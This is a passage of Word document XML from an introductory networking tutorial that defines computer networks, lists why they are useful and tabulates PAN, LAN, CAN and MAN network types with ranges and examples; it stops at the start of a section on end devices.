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6AF7" w14:textId="3606C8BE" w:rsidR="006750A5" w:rsidRDefault="006750A5" w:rsidP="00C75443">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Introduction to </w:t>
      </w:r>
      <w:r w:rsidRPr="006750A5">
        <w:t>Network</w:t>
      </w:r>
      <w:r>
        <w:t>ing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04CACD4A" w14:textId="77777777" w:rsidR="006750A5" w:rsidRPr="006750A5" w:rsidRDefault="006750A5" w:rsidP="006750A5">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r w:rsidRPr="006750A5">
        <w:t>What Is a Network?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29184E7D" w14:textId="77777777" w:rsidR="006750A5" w:rsidRPr="006750A5" w:rsidRDefault="006750A5" w:rsidP="006750A5">
      <w:r w:rsidRPr="006750A5">
        <w:t xml:space="preserve">A </w:t>
      </w:r>
      <w:r w:rsidRPr="006750A5">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>computer network</w:t>
      </w:r>
      <w:r w:rsidRPr="006750A5">
        <w:t xml:space="preserve"> is a collection of interconnected devices (computers, servers, smartphones, printers, etc.) that can communicate and share resources with each other. Think of it like a highway system where cars (data) travel between different cities (devices) using roads (network cables or wireless connections).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2487D333" w14:textId="06E26309" w:rsidR="006750A5" w:rsidRPr="006750A5" w:rsidRDefault="006750A5" w:rsidP="006750A5">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r w:rsidRPr="006750A5">
        <w:t xml:space="preserve">Why </w:t>
      </w:r>
      <w:r w:rsidR="00807EC7">
        <w:t>Are</w:t>
      </w:r>
      <w:r w:rsidRPr="006750A5">
        <w:t xml:space="preserve"> Networks</w:t>
      </w:r>
      <w:r w:rsidR="00807EC7">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00672E5B" w:rsidRPr="00087B8D">
        <w:t>Essential</w:t>
      </w:r>
      <w:r w:rsidRPr="006750A5">
        <w:t>?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09BE1170" w14:textId="77777777" w:rsidR="006750A5" w:rsidRPr="006750A5" w:rsidRDefault="006750A5" w:rsidP="006750A5">
      <w:r w:rsidRPr="006750A5">
        <w:t>Networks solve several fundamental problems:</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="2671"/>
        <w:gridCol w:w="6955"/>
      </w:tblGrid>
      <w:tr w:rsidR="006750A5" w:rsidRPr="006750A5" w14:paraId="5B441080" w14:textId="77777777" w:rsidTr="003F2FAE">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5BAFBB38" w14:textId="77777777" w:rsidR="006750A5" w:rsidRPr="006750A5" w:rsidRDefault="006750A5" w:rsidP="003F2FAE">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:spacing w:before="40" w:after="40"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006750A5">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Aspect</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7FAE42C2" w14:textId="77777777" w:rsidR="006750A5" w:rsidRPr="006750A5" w:rsidRDefault="006750A5" w:rsidP="003F2FAE">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:spacing w:before="40" w:after="40"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006750A5">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Details</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006750A5" w:rsidRPr="006750A5" w14:paraId="6894391E" w14:textId="77777777" w:rsidTr="003F2FAE">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5D39DA70" w14:textId="5C585F44" w:rsidR="006750A5" w:rsidRPr="006750A5" w:rsidRDefault="006750A5" w:rsidP="003F2FAE">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:spacing w:before="40" w:after="40"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r w:rsidRPr="006750A5">
              <w:t xml:space="preserve">Resource </w:t>
            </w:r>
            <w:r>
              <w:t>s</w:t>
            </w:r>
            <w:r w:rsidRPr="006750A5">
              <w:t>haring</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0F7DCFA9" w14:textId="77777777" w:rsidR="006750A5" w:rsidRPr="006750A5" w:rsidRDefault="006750A5" w:rsidP="003F2FAE">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:spacing w:before="40" w:after="40"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r w:rsidRPr="006750A5">
              <w:t>- Files: Share documents, photos, videos between devices</w:t>
            </w:r>
            <w:r w:rsidRPr="006750A5">
              <w:br/>
              <w:t>- Hardware: Share printers, scanners, storage devices</w:t>
            </w:r>
            <w:r w:rsidRPr="006750A5">
              <w:br/>
              <w:t>- Internet: Share a single internet connection among multiple devices</w:t>
            </w:r>
            <w:r w:rsidRPr="006750A5">
              <w:br/>
              <w:t>- Applications: Access software installed on remote servers</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006750A5" w:rsidRPr="006750A5" w14:paraId="341A72EE" w14:textId="77777777" w:rsidTr="003F2FAE">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="196032FB" w14:textId="77777777" w:rsidR="006750A5" w:rsidRPr="006750A5" w:rsidRDefault="006750A5" w:rsidP="003F2FAE">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:spacing w:before="40" w:after="40"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r w:rsidRPr="006750A5">
              <w:t>Communication</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1A907D0F" w14:textId="77777777" w:rsidR="006750A5" w:rsidRPr="006750A5" w:rsidRDefault="006750A5" w:rsidP="003F2FAE">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:spacing w:before="40" w:after="40"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r w:rsidRPr="006750A5">
              <w:t>- Email, instant messaging, video calls</w:t>
            </w:r>
            <w:r w:rsidRPr="006750A5">
              <w:br/>
              <w:t>- Real-time collaboration on documents</w:t>
            </w:r>
            <w:r w:rsidRPr="006750A5">
              <w:br/>
              <w:t>- Voice over IP (VoIP) phone systems</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006750A5" w:rsidRPr="006750A5" w14:paraId="475D5D7A" w14:textId="77777777" w:rsidTr="003F2FAE">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="75B7DD10" w14:textId="0144FF5C" w:rsidR="006750A5" w:rsidRPr="006750A5" w:rsidRDefault="006750A5" w:rsidP="003F2FAE">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:spacing w:before="40" w:after="40"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r w:rsidRPr="006750A5">
              <w:t xml:space="preserve">Centralized </w:t>
            </w:r>
            <w:r>
              <w:t>m</w:t>
            </w:r>
            <w:r w:rsidRPr="006750A5">
              <w:t>anagement</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="29A8AF64" w14:textId="77777777" w:rsidR="006750A5" w:rsidRPr="006750A5" w:rsidRDefault="006750A5" w:rsidP="003F2FAE">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:spacing w:before="40" w:after="40"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r w:rsidRPr="006750A5">
              <w:t>- Store all company data in one secure location</w:t>
            </w:r>
            <w:r w:rsidRPr="006750A5">
              <w:br/>
              <w:t>- Manage user accounts and permissions centrally</w:t>
            </w:r>
            <w:r w:rsidRPr="006750A5">
              <w:br/>
              <w:t>- Install software updates across multiple machines simultaneously</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006750A5" w:rsidRPr="006750A5" w14:paraId="651A01CE" w14:textId="77777777" w:rsidTr="003F2FAE">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="63D7FC77" w14:textId="1021A933" w:rsidR="006750A5" w:rsidRPr="006750A5" w:rsidRDefault="006750A5" w:rsidP="003F2FAE">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:spacing w:before="40" w:after="40"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r w:rsidRPr="006750A5">
              <w:t xml:space="preserve">Cost </w:t>
            </w:r>
            <w:r>
              <w:t>e</w:t>
            </w:r>
            <w:r w:rsidRPr="006750A5">
              <w:t>fficiency</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6FFD57B1" w14:textId="77777777" w:rsidR="006750A5" w:rsidRPr="006750A5" w:rsidRDefault="006750A5" w:rsidP="003F2FAE">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:spacing w:before="40" w:after="40"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r w:rsidRPr="006750A5">
              <w:t>- One printer for 50 employees instead of 50 printers</w:t>
            </w:r>
            <w:r w:rsidRPr="006750A5">
              <w:br/>
              <w:t>- One internet connection for the whole office</w:t>
            </w:r>
            <w:r w:rsidRPr="006750A5">
              <w:br/>
              <w:t>- Centralized software licensing</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006750A5" w:rsidRPr="006750A5" w14:paraId="70172559" w14:textId="77777777" w:rsidTr="003F2FAE">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="31C43A3E" w14:textId="13B629E4" w:rsidR="006750A5" w:rsidRPr="006750A5" w:rsidRDefault="006750A5" w:rsidP="003F2FAE">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:spacing w:before="40" w:after="40"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r w:rsidRPr="006750A5">
              <w:t xml:space="preserve">Backup and </w:t>
            </w:r>
            <w:r>
              <w:t>r</w:t>
            </w:r>
            <w:r w:rsidRPr="006750A5">
              <w:t>eliability</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4FFB2068" w14:textId="77777777" w:rsidR="006750A5" w:rsidRPr="006750A5" w:rsidRDefault="006750A5" w:rsidP="003F2FAE">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:spacing w:before="40" w:after="40"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r w:rsidRPr="006750A5">
              <w:t>- Automatic backups to network storage</w:t>
            </w:r>
            <w:r w:rsidRPr="006750A5">
              <w:br/>
              <w:t>- Redundant systems for high availability</w:t>
            </w:r>
            <w:r w:rsidRPr="006750A5">
              <w:br/>
              <w:t>- Disaster recovery capabilities</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="4300B2EE" w14:textId="77777777" w:rsidR="006750A5" w:rsidRPr="006750A5" w:rsidRDefault="006750A5" w:rsidP="006750A5">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r w:rsidRPr="006750A5">
        <w:t>Types of Networks</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61E860DD" w14:textId="2515CB58" w:rsidR="006750A5" w:rsidRPr="006750A5" w:rsidRDefault="006750A5" w:rsidP="006750A5">
      <w:r w:rsidRPr="006750A5">
        <w:t>Networks are classified based on their size, scope, and purpose:</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="3073"/>
        <w:gridCol w:w="2842"/>
        <w:gridCol w:w="6006"/>
      </w:tblGrid>
      <w:tr w:rsidR="006750A5" w:rsidRPr="006750A5" w14:paraId="445EDB14" w14:textId="77777777" w:rsidTr="006750A5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2AD8F499" w14:textId="77777777" w:rsidR="006750A5" w:rsidRPr="006750A5" w:rsidRDefault="006750A5" w:rsidP="006750A5">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:spacing w:before="40" w:after="40"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006750A5">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Network Type</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="602C6427" w14:textId="77777777" w:rsidR="006750A5" w:rsidRPr="006750A5" w:rsidRDefault="006750A5" w:rsidP="006750A5">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:spacing w:before="40" w:after="40"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006750A5">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Range</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="220B0C74" w14:textId="77777777" w:rsidR="006750A5" w:rsidRPr="006750A5" w:rsidRDefault="006750A5" w:rsidP="006750A5">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:spacing w:before="40" w:after="40"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006750A5">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Examples</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006750A5" w:rsidRPr="006750A5" w14:paraId="1A7E248A" w14:textId="77777777" w:rsidTr="006750A5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="31F0B4BF" w14:textId="77777777" w:rsidR="006750A5" w:rsidRPr="003F2FAE" w:rsidRDefault="006750A5" w:rsidP="006750A5">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:spacing w:before="40" w:after="40"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003F2FAE">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>PAN</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="06075E11" w14:textId="2EEC150F" w:rsidR="006750A5" w:rsidRPr="006750A5" w:rsidRDefault="006750A5" w:rsidP="006750A5">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:spacing w:before="40" w:after="40"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r w:rsidRPr="006750A5">
              <w:t>(Personal Area Network)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="63B076CF" w14:textId="77777777" w:rsidR="006750A5" w:rsidRPr="006750A5" w:rsidRDefault="006750A5" w:rsidP="006750A5">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:spacing w:before="40" w:after="40"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r w:rsidRPr="006750A5">
              <w:t>1</w:t>
            </w:r>
            <w:r w:rsidRPr="006750A5">
              <w:noBreakHyphen/>
              <w:t>10 m</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="03CACBBA" w14:textId="77777777" w:rsidR="006750A5" w:rsidRPr="006750A5" w:rsidRDefault="006750A5" w:rsidP="006750A5">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:spacing w:before="40" w:after="40"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r w:rsidRPr="006750A5">
              <w:t>Bluetooth between phone &amp; headphones, USB connections</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006750A5" w:rsidRPr="006750A5" w14:paraId="0429C026" w14:textId="77777777" w:rsidTr="006750A5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7059801D" w14:textId="77777777" w:rsidR="006750A5" w:rsidRPr="003F2FAE" w:rsidRDefault="006750A5" w:rsidP="006750A5">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:spacing w:before="40" w:after="40"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003F2FAE">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>LAN</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="744C8E2F" w14:textId="543AD711" w:rsidR="006750A5" w:rsidRPr="006750A5" w:rsidRDefault="006750A5" w:rsidP="006750A5">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:spacing w:before="40" w:after="40"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r w:rsidRPr="006750A5">
              <w:t>(Local Area Network)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7C84B142" w14:textId="77777777" w:rsidR="006750A5" w:rsidRDefault="006750A5" w:rsidP="006750A5">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:spacing w:before="40" w:after="40"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r w:rsidRPr="006750A5">
              <w:t>Up to 1 km</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="37F788ED" w14:textId="3C5DFB76" w:rsidR="006750A5" w:rsidRPr="006750A5" w:rsidRDefault="006750A5" w:rsidP="006750A5">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:spacing w:before="40" w:after="40"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r w:rsidRPr="006750A5">
              <w:t>(typically within a building)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2E4CBCA6" w14:textId="77777777" w:rsidR="006750A5" w:rsidRPr="006750A5" w:rsidRDefault="006750A5" w:rsidP="006750A5">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:spacing w:before="40" w:after="40"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r w:rsidRPr="006750A5">
              <w:t>Home Wi</w:t>
            </w:r>
            <w:r w:rsidRPr="006750A5">
              <w:noBreakHyphen/>
              <w:t>Fi network, office network</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006750A5" w:rsidRPr="006750A5" w14:paraId="65FA6FE9" w14:textId="77777777" w:rsidTr="006750A5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5375DDFC" w14:textId="77777777" w:rsidR="006750A5" w:rsidRPr="003F2FAE" w:rsidRDefault="006750A5" w:rsidP="006750A5">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:spacing w:before="40" w:after="40"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003F2FAE">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>CAN</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="50BD25E1" w14:textId="4B09D67A" w:rsidR="006750A5" w:rsidRPr="006750A5" w:rsidRDefault="006750A5" w:rsidP="006750A5">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:spacing w:before="40" w:after="40"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r w:rsidRPr="006750A5">
              <w:t>(Campus Area Network)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="03630BCC" w14:textId="77777777" w:rsidR="006750A5" w:rsidRPr="006750A5" w:rsidRDefault="006750A5" w:rsidP="006750A5">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:spacing w:before="40" w:after="40"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r w:rsidRPr="006750A5">
              <w:t>1</w:t>
            </w:r>
            <w:r w:rsidRPr="006750A5">
              <w:noBreakHyphen/>
              <w:t>5 km</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="09C84989" w14:textId="77777777" w:rsidR="006750A5" w:rsidRPr="006750A5" w:rsidRDefault="006750A5" w:rsidP="006750A5">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:spacing w:before="40" w:after="40"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r w:rsidRPr="006750A5">
              <w:t>University campus network, large corporate campus</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006750A5" w:rsidRPr="006750A5" w14:paraId="653D994B" w14:textId="77777777" w:rsidTr="006750A5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5CC08E85" w14:textId="77777777" w:rsidR="006750A5" w:rsidRPr="003F2FAE" w:rsidRDefault="006750A5" w:rsidP="006750A5">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:spacing w:before="40" w:after="40"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003F2FAE">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>MAN</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="53A42D83" w14:textId="717CD33C" w:rsidR="006750A5" w:rsidRPr="006750A5" w:rsidRDefault="006750A5" w:rsidP="006750A5">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:spacing w:before="40" w:after="40"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r w:rsidRPr="006750A5">
              <w:t>(Metropolitan Area Network)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="10F8ADC5" w14:textId="77777777" w:rsidR="006750A5" w:rsidRDefault="006750A5" w:rsidP="006750A5">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:spacing w:before="40" w:after="40"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r w:rsidRPr="006750A5">
              <w:t>5</w:t>
            </w:r>
            <w:r w:rsidRPr="006750A5">
              <w:noBreakHyphen/>
              <w:t>50 km</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5C72DBB2" w14:textId="78813C71" w:rsidR="006750A5" w:rsidRPr="006750A5" w:rsidRDefault="006750A5" w:rsidP="006750A5">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:spacing w:before="40" w:after="40"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r w:rsidRPr="006750A5">
              <w:t>(city</w:t>
            </w:r>
            <w:r w:rsidRPr="006750A5">
              <w:noBreakHyphen/>
              <w:t>wide)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3D632517" w14:textId="77777777" w:rsidR="006750A5" w:rsidRPr="006750A5" w:rsidRDefault="006750A5" w:rsidP="006750A5">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:spacing w:before="40" w:after="40"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r w:rsidRPr="006750A5">
              <w:t>City</w:t>
            </w:r>
            <w:r w:rsidRPr="006750A5">
              <w:noBreakHyphen/>
              <w:t>wide Wi</w:t>
            </w:r>
            <w:r w:rsidRPr="006750A5">
              <w:noBreakHyphen/>
              <w:t>Fi, cable TV networks</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="5FBA9D33" w14:textId="77777777" w:rsidR="006750A5" w:rsidRDefault="006750A5" w:rsidP="006750A5">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r w:rsidRPr="006750A5">
        <w:t>Network Components</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A95EAE9" w14:textId="314E2B2B" w:rsidR="006750A5" w:rsidRDefault="006750A5" w:rsidP="006750A5">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r w:rsidRPr="006750A5">
        <w:t>End Devices (Hosts)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E30DC93" w14:textId="77777777" w:rsidR="006750A5" w:rsidRPr="006750A5" w:rsidRDefault="006750A5" w:rsidP="006750A5">
      <w:r w:rsidRPr="006750A5">
        <w:t>These are the devices that send and receive data:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="438AE4B2" w14:textId="77777777" w:rsidR="006750A5" w:rsidRPr="006750A5" w:rsidRDefault="006750A5" w:rsidP="006750A5">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="80"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006750A5">
